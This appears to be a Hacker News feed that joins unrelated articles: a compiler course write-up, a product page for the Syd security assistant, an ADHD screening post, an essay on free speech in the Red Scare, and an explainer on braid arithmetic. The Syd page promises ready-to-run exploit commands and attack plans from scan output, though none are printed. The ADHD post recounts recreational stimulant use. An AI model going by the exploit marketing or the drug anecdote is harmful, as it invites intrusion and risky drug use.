 ;; =========================
 ;; Read initial board from input:
 ;; 81 integers, row-major, 0 = empty, 1..9 = given
 ;; Returns list of cells
 ;; =========================
 (define (read_board)
   (let ([board (void)])
     (let ([i 0])
       (begin
         (while (< i 9)
		(begin
                  (let ([j 0])
                    (while (< j 9)
			   (begin
			     (let ([v (read)])
                               (if (eq? v 0)
				   (set! board board)
				   (set! board (cons (make_cell i j v) board))))
			     (set! j (+ j 1)))))
                  (set! i (+ i 1))))
         board))))

 ;; =========================
 ;; Entry: read board, solve from (0,0), return solution
 ;; Solution is a list of (row col val) cells
 ;; =========================
 (let* ([board (read_board)]
        [solution (solve_cell 0 0 board)])
   (lookup solution 8 8)))

The Full Language

The final language you’ll implement will be this one. In comments, I’ve also highlighted the sublanguages: for example, project 2 includes only numbers, input (read), binary plus, unary minus, variable references and let binding. It grows to all of R5 .

(define (R5-exp? e)
  (match e
    ;; Project 2
    [(? fixnum?) #t]
    ['(read) #t]
    [`(+ ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(- ,(? R5-exp? e)) #t]
    [(? symbol?) #t]
    [`(let ([,(? symbol? x) ,(? R5-exp? e)]) ,(? R5-exp? eb)) #t]
	;; Project 3
    [#t #t]
    [#f #t]
    ['(void) #t]
    [`(- ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(and ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(or  ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(not ,(? R5-exp? e1)) #t]
    [`(,(? cmp? c) ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(if ,(? R5-exp? e-g) ,(? R5-exp? e-t) ,(? R5-exp? e-f)) #t]
    ;; Project 4
    [`(let* ([,(? symbol? xs) ,(? R5-exp? es)] ...) ,(? R5-exp? eb)) #t]
    [`(begin ,(? R5-exp?) ... ,(? R5-exp? ret)) #t]
    [`(while ,(? R5-exp? e-g) ,(? R5-exp? es) ...) #t]
    [`(make-vector ,(? R5-exp? len)) #t]
    [`(vector-ref ,(? R5-exp? v) ,(? fixnum? i)) #t]
    [`(vector-set! ,(? R5-exp? v) ,(? fixnum? i) ,(? R5-exp? e-v)) #t]
    [`(set! ,(? symbol? x) ,(? R5-exp? e)) #t]
    ;; Project 5
    [`(,(? R5-exp? e-f) ,(? R5-exp? a-args) ...) #t]
    [`(lambda (,(? symbol? xs) ...) ,(? R5-exp? e-body)) #t]
	[_ #f]))

(define (R5-defn? defn)
  (match defn
    ;; Project 5 adds multiple function definitions
    [`(define (,(? symbol? f) ,(? symbol? formals) ...)  ,(? R5-exp? e-b)) #t]
    [_ #f]))

(define (R5? p)
  (match p
    [`(program ,(? R5-defn? defns) ... ,(? R5-exp?)) #t]
    [_ #f]))

The Compiler’s Structure

To get you booted up fast as possible, every single project is designed the same way:

  • compile.rkt – Your pass implementations. You will edit functions provided here. -> This is the only file you will edit! The rest are read-only
  • irs.rkt – IR definitions and predicates like anf-program? , c1-program? , etc. (see also typed/shrunk variants)
  • interpreters.rkt – Reference interpreters for several IRs (used by tests and for your own debugging).
  • system.rkt – System/ABI configuration, pass names, runtime filenames, output paths, etc.
  • main.rkt – Driver that runs all passes, can build a binary, and can launch a debug server.
  • test.rkt – Test harness. Runs isolation tests or end-to-end native tests depending on -m mode.
  • runtime.c – Minimal runtime ( read_int64 , print_int64 , etc.).
  • test-programs/ – Example programs ( .scm ).
  • input-files/ – Input streams for programs (lines of integers).
  • goldens/ – Instructor goldens (IR snapshots, interpreter outputs, and stdout baselines).

You write your code in compile.rkt , which consists of a set of passes . Each pass transforms an input language into an output language, and these intermediate languages (IRs) are codified via predicates in irs.rkt . To define the meaning of each IR, we give an interpreter for each in interpreters.rkt . For the compiler to be correct, it needs to be the case that–for all input streams–the compiler produces the same output stream across all intermediate IRs. There is some system-specific stuff in system.rkt , which takes care of things like Linux vs. Mac ABI issues, specifying register names, etc. The main.rkt file acts as a main compiler entrypoint, and it carefully runs each pass of the compiler, checking predicates before/after each pass and interpreting each IR, checking to ensure consistency. This is a huge win for debugging, in my opinion: you always want to localize errors to the proximate pass which causes misinterpretation, and main.rkt seriously aids debugging in my experience. There is also more comprehensive test infrastructure in test.rkt ; this test script is invoked by the Python-based test scripts in test/ . These tests check the behavior of the compiler on the programs in the test-programs/ directory, using the files from input-files as inputs and comparing to the outputs in goldens/ .

Why Is This Course Unique and Cool?

  • You build a real compiler , all the way to actual x86-64 assembly.

  • Each IR has a corresponding interpreter, which is easy to find/read and written in a familiar style, giving semantic clarity and testable correctness.

  • The project is language scalable , meaning that you can use it as a base for building your own language. Of course, this is thanks to Dr. Siek’s great “incremental” design.

  • It is fully testable across multiple passes , which helps anticipate the thing we all fear most about writing a compiler: seeing a problem that is the ramification of far-away code from higher up in the compilation pipeline.

  • It is written in a simple, pure recursive style . Just plain old pattern matching and recursion here, no need for any complex abstractions.

How Do I Get Started?

  • Familiarize yourself with the course webpage: https://kmicinski.com/cis531-f25

  • If you don’t know Racket, start with project 1: https://kmicinski.com/cis531-f25/projects/1

  • Otherwise, start with project 2: https://kmicinski.com/cis531-f25/projects/2

  • When you finish each project, move on to the next!

  • When you’re done, start building your own language. Consider adding type (checking/inference), classes, more builtins, pattern matching, continuations, exceptions, algebraic effects. The options are myriad, but once you’ve finished projects 2-5, you’ve built a whole compiler for a surprisingly expressive language.

Thank you to the National Science Foundation and Others

If you like this work and live in the United States, please feel commensurately less bad about paying your taxes. I made the whole class free, at least as free as I could given practical constraints. This class work on compilation is partially supported by our NSF PPoSS large , which has already produced many cool major results . In subsequent explorations, I am hoping that I can use this class compiler as a baseline for highly-scalable engines that reason about programs. Given the simple, self-contained nature–and the presence of per-pass interpreters and consistency testing–I see this as an awesome potential baseline for cool extensions.

My course is of course heavily inspired by Prof. Siek’s book and course, along with inspiration from Thomas Gilray at Washington State. Eight years ago, Tom and I took a spontaneous trip to see the eclipse halfway across the country (skipping out on the ICSE ‘17 deadline basically); we discussed compiler design over a steamed seafood buffet in Myrtle Beach after napping in a cheap motel, having been awake for over 24 hours and feeling the eclipse had made it worth it. We sketched out his whole compiler on that roadtrip, and ever since that night eating steamed crabs, I wanted to build my own course compiler. Now that I have, I am not sure it compares to waking up for just four hours of twilight, only to consume copious amounts of butter and shellfish as the brisk ocean air wisps over your face, the closures and continuations softly washing rhythmically through the conversation as you walk along the beach back to your $50 motel room.

In closing, thanks for checking this out, this compiler was a ton of fun to build. Even as someone who has some amount of expertise in compiler design, building it and getting it 100% right (I hope!) was such a rewarding experience. My real sincere hope is that it offers students (and you!) a fun journey. If you end up doing anything this, please get in touch: kkmicins@syr.edu. I’d love to see what you come up with. Best wishes,

Kristopher Micinski – Syracuse, November, 2025

Show HN: Syd – An offline-first, AI-augmented workstation for blue teams

Hacker News
www.sydsec.co.uk
2025-11-24 07:11:38
Comments...
Original Article

Syd AI Assistant: Your Air-Gapped Cybersecurity Expert

Unleash the power of AI for offensive and defensive security operations, all within a secure, offline environment.

Watch Syd analyse tool output and provide instant exploitation guidance

Back Syd Now - From £50

The Syd Advantage

Uncompromising Security

In a world of cloud-based AI, Syd stands apart. Delivered on a physical 1TB SSD and updated via encrypted USB, Syd is truly air-gapped. This means zero risk of your sensitive client data, vulnerabilities, or proprietary tools ever being exposed to a third-party service.

Powered by local Dolphin Llama 3 8B model – no internet connection required

Accelerated Workflow

Turn hours of manual analysis into seconds of AI-powered insight. Syd's RAG engine searches over 356,000 cybersecurity knowledge chunks and instantly transforms raw tool output into actionable intelligence.

Automatic detection of Nmap, Volatility, YARA, PCAP, and over 20 other tools

On-Demand Expertise

Syd combines a specialised LLM with over 356,000 chunks covering Metasploit exploits, Atomic Red Team techniques, forensics workflows, CVE databases, and threat intelligence, making expert-level knowledge accessible around the clock.

2GB+ knowledge base including exploits, forensics, and incident response workflows

For Red Teams

Syd empowers you with instant access to exploit intelligence. Paste Nmap results and get ready-to-run Metasploit commands and Exploit-DB links, turning vulnerability scans into actionable attack plans in seconds.

See Offensive Capabilities

For Blue Teams & IR

Syd provides context-aware remediation steps, malware-specific workflows from YARA outputs, and deep forensic insights from Volatility findings, helping you respond to threats faster and more effectively.

See Defensive Capabilities

A True Multi-Tool Platform

Syd isn't just a single tool; it's an intelligence engine that integrates with the tools you already use.

Broad Integration

Syd integrates with a vast array of tools including Nmap, Metasploit, Sliver, Bloodhound, Crackmapexec, Impacket, Responder, Hashcat, Feroxbuster, Curl/Ncat, Payloadbuilder (Red Team); Zeek, Volatility3, YARA, PCAP Analysis, Chainsaw, Suricata, Sysmon Helper, Tshark, Raccine, Autopsy/Sleuth Kit (Blue Team); and File Triage, Wordlist Manager, Credential Safe, Artefact Viewer, Report Builder (Utilities).

See All Integrations

Context is Key

Syd knows the difference between offensive and defensive tools, providing exploit guidance for Nmap scans and remediation steps for YARA detections automatically.

Learn More

Future-Proof Architecture

With a roadmap including dedicated IOC databases and smart indexing, Syd is designed to grow alongside your team's needs and expertise.

See the Roadmap

© 2025 Syd AI Assistant. All rights reserved.

A One-Minute ADHD Test

Hacker News
psychotechnology.substack.com
2025-11-24 07:09:28
Comments...
Original Article

There is a six-question test for ADHD that takes a minute to complete. If you score highly on it, you are likely to have ADHD and have a strong reason to talk to a psychiatrist about getting medication. It’s a low-effort way to surface a real problem for yourself — or help someone else surface it.

Here’s the story of how I found the test. If you just want the test, skip this section.

A few years ago when I was moving from Moscow to London I had small leftover amounts of simulants 3-FMC and MDPV from my student days. I’d use them for productivity during exam periods, but I never actually enjoyed them recreationally. Still, I was not going to carry sketchy chemicals across two borders, so I figured I’d experiment with recreational use.

I snorted a small line of 3-FMC and instead of having fun I finally felt clearheaded enough to stop procrastinating on writing a farewell post for my then-colleagues. I knew stimulants are a common treatment for ADHD, so a question popped into my head: do I have ADHD? Yes, stimulants help everyone focus , but the contrast was too striking to ignore.

I took a few online tests, they did suggest ADHD. I then read more about ADHD online and that also suggested I had it. I kept reading and reading wanting full certainty.

An actual depiction of me trying to figure out ADHD

There was only one definitive way to find out: get a diagnosis from a psychiatrist.

I was leaving Russia in a few weeks, and Russia bans first-line ADHD medications like amphetamine and methylphenidate. So I decided to wait until I moved to London. After two months after arriving in London, I booked a private assessment with a psychiatrist. Shortly after, I had the 1.5 hour assessment and walked out with an ADHD diagnosis and a prescription for lisdexamfetamine, a prodrug of d-amphetamine.

One of the questionnaires they sent me before the appointment was very short. I later learned that this six-question screener is surprisingly effective.

In the test above, give yourself one point for each answer in the grey square. If you score 4 out 6, you have a strong reason to suspect ADHD and get a proper assessment.

Just the six questions above have a sensitivity of 69% and specificity of 99.5% in the general population . This means:

  • They correctly identify two thirds of adults with ADHD and miss the other third.

  • They flag 0.5% of people without ADHD as possibly having ADHD.

If we assume 5% of people have ADHD ( this source gives 4.4%, and this gives 6%), then:

  • The test would correctly pick up 3.5% of the population as having ADHD (0.69 × 5%).

  • It would incorrectly flag about 0.5% (≈0.475%, rounding up) of the population who don’t have ADHD.

So if you score 4 out of 6, the chance you actually have ADHD is:

3.5% / (3.5% + 0.5%) = 87.5%.

ADHD is highly treatable with meds. First-line treatments for ADHD — stimulants like amphetamine and methylphenidate — work really well. To quote a podcast on psychiatry: “Stimulants are one of the most effective meds in psychiatry” ( source ), ”Not many treatments in psychiatry have a large effect size. There’s stimulants for ADHD, ketamine for depression” ( source ).

70-90% of people with ADHD find stimulants effective and experience noticeable quality of life improvements.

And if you don’t want to take stimulants or they don’t work for you, there are non-stimulant medications, such as atomoxetine or Intuniv .

This test is an imperfect screening tool that misses a third of all true ADHD cases and incorrectly flags a small percentage of non-ADHD people. But it has an incredible signal to effort ratio — it only takes a minute to take. If you score above its threshold — you have a strong reason to seek a full assessment.

Even if you are confident you don’t have ADHD, it’d only take you a minute to test your distractible friend. The right medication could be life-changing for them — it certainly was for me.

Discussion about this post

First Amendment in Flux: When Free Speech Protections Came Up Against the Red Scare

Portside
portside.org
2025-11-24 06:56:09
First Amendment in Flux: When Free Speech Protections Came Up Against the Red Scare Ira Mon, 11/24/2025 - 01:56 ...
Original Article

Hollywood screenwriter Samuel Ornitz speaks before the House Un-American Activities Committee in Washington, D.C., on Oct. 29, 1947. | UPI/Bettmann Archive via Getty Images

As the United States faces increasing incidents of book banning and threats of governmental intervention – as seen in the temporary suspension of TV host Jimmy Kimmel – the common reflex for many who want to safeguard free expression is to turn to the First Amendment and its free speech protections.

Yet, the First Amendment has not always been potent enough to protect the right to speak. The Cold War presented one such moment in American history, when the freedom of political expression collided with paranoia over communist infiltration .

In 1947, the House Un-American Activities Committee subpoenaed 10 screenwriters and directors to testify about their union membership and alleged communist associations. Labeled the Hollywood Ten , the defiant witnesses – Alvah Bessie, Herbert Biberman, Lester Cole, Edward Dmytryk, Ring Lardner Jr., John Howard Lawson, Albert Maltz, Samuel Ornitz, Adrian Scott and Dalton Trumbo – refused to answer questions on First Amendment grounds. During his dramatic testimony, Lawson proclaimed his intent “to fight for the Bill of Rights,” which he argued the committee “was trying to destroy.”

They were all cited for contempt of Congress . Eight were sentenced to a year in federal prison, and two received six-month terms. Upon their release, they faced blacklisting in the industry . Some, like writer Dalton Trumbo, temporarily left the country .

As a researcher focused on the cultural cold war , I have examined the role the First Amendment played in the anti-communist hearings during the 1940s and ’50s.

The conviction and incarceration of the Hollywood Ten left a chilling effect on subsequent witnesses called to appear before congressional committees. It also established a period of repression historians now refer to as the Second Red Scare .

Although the freedom of speech is enshrined in the Constitution and prized by Americans, the story of the Second Red Scare shows that this freedom is even more fragile than it may now seem.

The Fifth Amendment communists

After the 1947 hearings, the term “ unfriendly ” became a label applied by the House Un-American Activities Committee and the press to the Hollywood Ten and any witnesses who refused to cooperate with the committee. These witnesses, who wanted to avoid the fate of the Hollywood Ten, began to shift away from the First Amendment as a legal strategy.

They chose instead to plead the Fifth Amendment , which grants people the right to protect themselves from self-incrimination. Many prominent artists during the 1950s, including playwright Lillian Hellman and singer and activist Paul Robeson , opted to invoke the Fifth when called before the committee and asked about their political affiliations.

The Fifth Amendment shielded hundreds of “unfriendly” witnesses from imprisonment, including artists, teachers and federal workers. However, it did not save them from job loss and blacklisting .

While they could avoid contempt citations by pleading the Fifth, they could not erase the stain of perceived guilt. This legal approach became so widespread that U.S. Sen. Joseph McCarthy , the country’s leading anti-communist crusader, disparaged these witnesses as “ Fifth Amendment Communists ” and boasted of purging their ranks from the federal government.

Three photos of a man in suit and tie.

Three portraits of Albert Einstein taken in Princeton, N.J., in March 1953. AP Photo

From Fifth back to First

In 1953, the physicist Albert Einstein became instrumental in revitalizing the force of the First Amendment as a rhetorical and legal tactic in the congressional hearings. Having fled Germany after the Nazis came to power, Einstein took a position at Princeton in 1933 and became an important voice in American politics.

Einstein’s philosophical battle against McCarthyism began with a letter to a Brooklyn high school teacher named William Frauenglass.

In April of that year, Frauenglass was subpoenaed to appear before the Senate Internal Security Subcommittee, “ the Senate counterpart ” of the House Un-American Activities Committee, to testify about his involvement in an intercultural education seminar. After the hearing, in which Frauenglass declined to speak about his political affiliations, he risked potential termination from his position and wrote to Einstein seeking support.

In his response, Einstein urged Frauenglass and all intellectuals to enact a “ revolutionary” form of complete “noncooperation ” with the committee.

While Einstein advised noncompliance, he also acknowledged the potential risk : “Every intellectual who is called before one of the committees ought to refuse to testify, i.e., he must be prepared for jail and economic ruin, in short, for the sacrifice of his personal welfare in the interest of the cultural welfare of his country.”

Frauenglass shared his story with the press, and Einstein’s letter was published in full in The New York Times on June 12, 1953. It was also quoted in local papers around the country.

One week later, Frauenglass was fired from his job.

After learning about Einstein’s public position, McCarthy labeled the Nobel laureate “ an enemy of America .” That didn’t stop Einstein’s campaign for freedom of expression. He continued to encourage witnesses to rely on the First Amendment.

When the engineer Albert Shadowitz received a subpoena in 1953 to appear before McCarthy’s Senate Permanent Subcommittee on Investigations, to answer questions about alleged ties to the Communist Party, he traveled to Einstein’s home to seek out the physicist’s advice. After consulting with Einstein, Shadowitz opted for the First Amendment over the Fifth Amendment.

On Dec. 16, 1953, Shadowitz informed the committee that he had received counsel from Einstein. He then voiced his opposition to the hearing on the grounds of the First Amendment: “I will refuse to answer any question which invades my rights to think as I please or which violates my guarantees of free speech and association.”

He was cited for contempt in August 1954 and indicted that November, facing a potential year in prison and US$1,000 fine. As an indicator of McCarthy’s diminishing power, the charge was thrown out in July 1955 by a federal judge.

A Black man sits in front of a table with a microphone on it.

Singer Paul Robeson appears before the House Un-American Activities Committee in Washington, D.C., in 1956. Bettmann Archive/Getty Images

The triumph of dissent

Well-known public figures also began to turn away from the Fifth Amendment as a legal tactic and to draw on the First Amendment.

In August 1955, when the folk musician Pete Seeger testified before the House Un-American Activities Committee, he voiced his rejection of the Fifth Amendment defense during the hearing. Seeger asserted that he wanted to use his testimony to call into question the nature of the inquiry altogether.

Pleading the protection of the First Amendment, Seeger refused “to answer any questions” related to his “political beliefs” and instead interrogated the committee’s right to ask such questions “under such compulsion as this.”

When the playwright Arthur Miller was subpoenaed by the committee in 1956, he also refused to invoke the Fifth. Both were cited for contempt. Seeger was sentenced to a year in prison. Miller was given the option to pay a $500 dollar fine or spend 30 days in jail.

As Seeger and Miller fought their appeals in court, McCarthy’s popularity continued to wane, and public sentiment began to shift.

Prompted by Einstein, the noncompliant witnesses in the 1950s reshaped the public discussion, refocusing the conversation on the importance of freedom of expression rather than the fears of imagined communist infiltration.

Although the First Amendment failed to keep the Hollywood Ten out of prison, it ultimately prevailed. Unlike the Hollywood Ten, both Miller and Seeger won their appeals. Miller spent no time in prison and Seeger only one day in jail. Miller’s conviction was reversed in 1958, Seeger’s in 1962. The Second Red Scare was over.

As the Second Red Scare shows, when free speech is under attack, strategic compliance may be useful for individuals. However, bold and courageous acts of dissent are critical for protecting First Amendment rights for everyone. The Conversation

Jodie Childers , Assistant Professor of English, University of Virginia

This article is republished from The Conversation under a Creative Commons license. Read the original article .

The Arithmetic of Braids (2022)

Hacker News
mathcenter.oxford.emory.edu
2025-11-24 06:44:57
Comments...
Original Article

Whether in the context of hairstyles, friendship bracelets, or even parachute cords -- most will be familiar with the notion of a braid.

As can be seen in the images above, each braid starts with some number of strands which are repeatedly crossed under/over each other in some way. Note that we typically don't allow the strands of a braid to "turn back up".

We can represent the particular crossings of a braid with a braid diagram like the one shown below. Note the diagram shown describes a braid similar to (but longer than) the hair braid above.

Of course, other braids will have a different number of strands and/or a different sequence of crossings. Some may even include sequences of crossings that don't even repeat, such as the one shown below:

Taking inspiration from braids in the real world, "tugging" on the strands in one direction or another -- even when new crossings result (as long as we don't allow any one strand to pass through another) -- can lead to different representations of what is essentially the same braid. As an example, consider the following two diagrams which actually represent the same braid.

While the two braid diagrams above represent the same braid, certainly the one on the left seems "simpler" in some capacity. This raises the question: " How does one simplify a given braid diagram? " Remember this question -- we'll come back to it in a bit.

Admittedly, drawing braid diagrams like the ones previously seen -- and especially when they are not fully simplified -- can be tedious. However, there is a much easier way to represent braids!

Towards this end, observe that if we "tug" in just the right places, we can always jiggle any particular crossing a little bit to the left or right, as desired. In this way, we can arrange any braid (with a finite number of crossings, anyways) so that no two crossings happen simultaneously as we scan the braid from left to right.

As an example, consider the braid diagram involving 5 strands presented earlier, which is shown again below on the left. Numbers and vertical lines have been added to help make the positions of the crossings easier to identify.

In the diagram below on the left, multiple crossings sometimes happen simultaneously between consecutive pairs of vertical lines. For example, between the first pair of vertical lines, the strands at positions $1$ and $2$ cross (red and green) and the strands at positions $3$ and $4$ cross (blue and orange). Similarly, between the second pair of vertical lines, the strands at positions $1$ and $2$ again cross (green and red) and the strands at positions $4$ and $5$ cross (blue and black).

However, with a bit of tugging on the strands we can ensure only one crossing happens at a time as we move from left to right along the braid. Notice how in the diagram on the right the initial red/green crossing has been jiggled a bit to the left and the initial blue/orange crossing has been jiggled a bit to the right. In this way, the red/green crossing now happens first, and the blue/orange crossing now happens second.

Indeed, once things have been "jiggled" in this way, what we see happening between pairs of consecutive lines reduces down to just a few simple possibilities for $5$ strands (there would of course be more if there were more strands involved):

Importantly, if we have names for these possibilities (above we have used $a$ through $h$), then we can describe the braid in question with a simple sequence of letters. So for example, using the above we might identify the braid we've been discussing with the following sequence of letters (also known as a "word"): $$aeahchchedh$$

As much as this can help reduce the tedium of describing a braid from drawing a complicated picture to just writing down a sequence of letters -- implicit in the above is an even greater revelation. Notice it suggests a natural way to combine two braids together to produce a new (longer) braid -- through concatenation !

Consider the two small braids below, which are combined by concatenating the second to the first to form a longer braid. Note, we'll use the "$*$" operator to indicate the action of concatenation:

One should note that for two braids on the same number of strands, we can always combine them in this way to get another braid (again with the same number of strands).

In general, when combining two things of the same "type" (e.g., two braids on $n$ strands) via some operation (e.g., concatenation) and the result is always of the same type, we say the "things" of this type under the associated operation are closed (or equivalently, that they satisfy the property of closure with respect to that operation). To understand the word choice here, note that the combination of any two braids by concatenation will never be anything besides another braid -- a flamingo, for example. Combinations of braids must stay in the "braid universe". We can't get to the universe of flamingos if concatenating is all we can do. The flamingo universe is inaccessible -- it is "closed off" from us.

Closure will become very important to us later, but just to mention a couple of specific examples to reinforce the idea: Note that even integers are closed with respect to addition, but odd integers are not. Similarly integers are closed with respect to multiplication, but not with respect to division.

Turning attention back to braids -- note that denoting the result of concatenating braids $B_1$ and $B_2$ with $B_1 * B_2$ subtly suggests this operation of concatenation behaves in a way similar to real number multiplication. The use of an asterisk "*" after all is a frequent way to denote a product (especially in programming).

Let's think about that for a moment -- what exactly do we mean by "behaves in a way similar to real number multiplication"? The real numbers are certainly closed under multiplication, but surely we must mean more than that! As we mull over the various properties we know multiplication of real numbers enjoy -- ones we hope braids under concatenation will also enjoy -- we might find it promising to ask the following questions to this end:

  • Is braid concatenation associative?
    Recall, this is certainly a property of real-number multiplication: $(ab)c = a(bc)$

  • Is there an identity braid?
    That is to say, is there something that functions like the real number $1$ with respect to multiplication, in that for any real number $x$, we have $x \cdot 1 = 1 \cdot x = x$? (i.e., some special value that when we multiply some other value by it (or vice-versa), that other value's "identity" is preserved)

  • Do braids have inverses?
    We certainly have multiplicative inverses for real numbers (provided they aren't zero). That is, there is a real-number $x^{-1}$ for every non-zero real number $x$ (namely $x^{-1} = 1/x$) where the products $x \cdot x^{-1}$ and $x^{-1} \cdot x$ both equal the multiplicative identity, $1$.

Let us consider each of these in turn. For convenience, for the second and third questions, we'll assume the number of strands involved is $4$, but generalizations to some other number of strands should be both natural and (hopefully) obvious.


Q: Is braid concatenation associative?

That is to say, for any three braids $B_1$, $B_2$, and $B_3$, are $(B_1 * B_2) * B_3$ and $B_1 * (B_2 * B_3)$ always the same braid?

Absolutely! This is an immediate result of how concatenation works. We don't even need to consider any specific braids to see this. Just let the yellow, pink, and green rectangles below represent arbitrary braids $B_1$, $B_2$, and $B_3$, respectively.


Q: Is there an identity braid?

Again, recall the multiplicative identity for real numbers is the value $1$ as we can multiply any real value by $1$ (or vice-versa) and leave it unchanged. Notice this works in both directions -- that is to say, for any real value $x$, it is true that $x \cdot 1 = 1 \cdot x = x$.

Similarly, the additive identity for real numbers is the value $0$ as we can add $0$ to any real value $x$ and leave it unchanged. (Again, reversing the order from $x+0$ to $0+x$ has no impact -- both result in $x$.)

If we seek an identity braid with respect to concatenation, then we seek a braid that could be concatenated to any other braid (on either side) and leave its sequence of crossings unchanged.

Consider that unique braid on some number of strands, $I$, that has no crossings at all!

As the below clearly suggests, concatenating such a braid $I$ to any other braid $B$ (with the same number of strands, of course) leaves $B$ essentially unchanged (i.e., the strands might be a tad longer, but the crossings are all still intact, ant that's what's important).

The reverse is easily shown to hold as well (i.e., $I * B = B$ for any braid $B$).

As such, the braid $I$ on $n$ strands with no crossings serves as an identity for the concatenation of braids on $n$ strands.


Q: Do braids have inverses?

Here again, let us restrict our attention to "braids on $n$ strands" for a particular $n$.

Following the pattern of multiplicative inverses discussed earlier, we then seek for any such braid $B$ an inverse $B^{-1}$ where $B * B^{-1} = I$ and $B^{-1} * B = I$     (assuming $I$ denotes the braid identity)

Remember the simple braids that we previously used to identify a braid of $5$ strands with a sequence of letters? Here's a similar set of braids for braids of $4$ strands:

Regardless of the number of strands involved, notice that these always occur in pairs where the same two strands cross -- with one with one strand on top and the other where the other strand is on top. Indeed, each of these pairs is an inverse pair , as suggested by the names given to the six simple braids immediately above. After concatenating each such pair, only a couple of tugs on the strands are needed to simplify the result to the identity braid $I$ (on $n$ strands), as the below demonstrates for one such pair:

Just to be explicit about the naming convention adopted above, note that for any $i = 1,2,3,\ldots$, we let $x_i$ denote the braid where strands at positions $i$ and $i+1$ cross, with the strand at position $i$ going "over" the strand at position $i+1$. We denote the inverse of $x_i$ by $x_i^{-1}$, where the strand at position $i$ goes "under" the strand at position $i+1$. As a matter of verbiage, we call the set of all such $x_i$ and their inverses the elementary braids on $n$ strands.

Armed now with these inverse pairs of elementary braids, we can build inverses for more complicated braids.

We can think of the individual crossings as actions taken on the strands that change their state, much like the individual actions of putting on one's socks, shoes, and rain boots (which go over one's shoes) each change the state of your feet. The inverse action to some combination of these can be found by "undoing" each individual action, but in reverse.

Suppose one puts on one's socks, and then shoes, and then rain boots, in that order. We could consider other orders, but are likely to over-stretch our socks in doing so. 😆 To undo this combination of three individual actions (returning one's feet to their bare state), one removes the rain boots, then removes one's socks, then removes one's socks. (Note the reverse order!)

Likewise, if we apply elementary braids $x_1$, $x_3^{-1}$, and $x_2$ in that order, we can undo them by applying their inverses $x_2^{-1}$, $x_3$, and then $x_1^{-1}$, in this reversed order.

Below are the braid diagrams for concatenation and simplification of the example just described. Note that, given how far this similarity between braid concatenation and real number multiplication seems to be going, we'll go ahead and adopt some additional notational conventions often used for products.

Specifically -- just as we often abbreviate $a \cdot b$ with $ab$ when dealing with products of real numbers $a$ and $b$ -- we'll often omit the "$*$" operator between variables representing braids (elementary or otherwise), leaving their concatenation assumed by their adjacency. We may also now start referring to such concatenations as "braid products", or simply "products" when the context is clear.

As you consider the braid product being simplified below, note how we take advantage of the associativity of braid concatenation to evaluate the product of the center-most two elementary braids at each step -- which, being an inverse pair, results in the identity braid $I$ which can then be removed as it has no effect (except the last $I$, of course).

Of course, we could imagine untangling the initial concatenation by visualizing tugging some of the strands up or down at key moments to reduce the number of crossing too. However, the advantage of using the properties of inverses and identities to get from one step to the next is that we no longer really need the pictures (which were cumbersome to draw in the first place) -- we can proceed to simplify things in a completely algebraic way, as shown next.

As you consider the concatenation of braids $x_1 x_3^{-1} x_2$ and $x_2^{-1} x_3 x_1^{-1}$ below and its (algebraic) simplification, notice that we have initially added parentheses around each, so that we can more easily see what is being concatenated at the moment. Of course, using parentheses in this way again mirrors yet another familiar way we often write products of real numbers. For example, $6 = (2)(3)$. $$\begin{array}{rcl} (x_1 x_3^{-1} x_2)(x_2^{-1} x_3 x_1^{-1}) & = & x_1 x_3^{-1} x_2 x_2^{-1} x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} (x_2 x_2^{-1}) x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} I x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} (I x_3) x_1^{-1}\\ & = & x_1 x_3^{-1} x_3 x_1^{-1}\\ & = & x_1 (x_3^{-1} x_3) x_1^{-1}\\ & = & x_1 I x_1^{-1}\\ & = & x_1 (I x_1^{-1})\\ & = & x_1 x_1^{-1}\\ & = & I \end{array}$$

In truth, the above is a bit verbose -- showing all the intermediate steps each time an inverse pair produces an identity braid $I$, which then combines with whatever comes next to leave only whatever comes next.

In practice, this combination of steps is so common we often omit this level of detail when writing the steps taken to simplify a braid -- writing only something similar to the below (which one will notice mirrors the "braid words" given with the pictures above):

$$\begin{array}{rcl} (x_1 x_3^{-1} x_2)(x_2^{-1} x_3 x_1^{-1}) & = & x_1 x_3^{-1} x_2 x_2^{-1} x_3 x_1^{-1}\\ & = & x_1 x_3^{-1} x_3 x_1^{-1}\\ & = & x_1 x_1^{-1}\\ & = & I \end{array}$$

There is precedence for this. Consider the steps taken as one simplifies the fraction $\frac{ab}{b}$ (where $b \neq 0$), which are shown below. (Remember that $\frac{b}{b}$ equals the value $1$, the multiplicative "identity"): $$\frac{ab}{b} = a \cdot \frac{b}{b} = a \cdot 1 = a$$ Something like this happens every time one cancels a common factor in the numerator and denominator of a fraction -- but we often skip all that detail, writing only $$\frac{ab}{b} = a$$


Braid Multiplication and Commutativity

The above clearly establishes there is some sort of "multiplicative arithmetic" we can apply to braids, but we must be careful to not let our analogy go too far. One significant difference between braid multiplication and the multiplication of numerical values with which we are well familiar is that braid multiplication is not generally commutative.

That is to say, we don't always have $B_1 B_2 = B_2 B_1$ for any braids $B_1$ and $B_2$.

As a simple example of this, consider the following two braids. Notice the first "product" on the right can't be simplified to the second. For example, the strand initially at position $1$ ends up in position $4$ in the first product, but not in the second.

The lack of general commutivity for braid products certainly decreases the ease with which we may manipulate braids, but as Alexander Graham Bell once said: "When one door closes, another opens."

Special pairs of braids do actually enjoy commutativity. One can easily see how the identity braid $I$, and any other braid will commute. The same can be said of inverse pairs. Interestingly, "distant" elementary braids also commute. That is to say, adjacent elementary braids $x_i$ and $x_j$ will commute if they are far enough apart that they don't involve a common strand position. Noting that this only happens when $i$ and $j$ are at least two positions apart, we can equivalently say for adjacent elementary braids $x_i$ and $x_j$: $$x_i x_j = x_j x_i \textrm{ when } |i-j| \ge 2$$

This is perhaps easier to understand with an example. Note in the diagram below, we can change the order of the pink elementary braids without effectively changing the overall braid. However, if we change the order of the yellow elementary braids, the overall braid is a different braid.


Artin's Relation

Emil Artin

Named after Emil Artin, one of the leading mathematicians of the twentieth century and who developed the theory of braids as a branch of an area in mathematics known as algebraic topology, Artin's relation provides the last piece of the puzzle when establishing the strange arithmetic of braids.

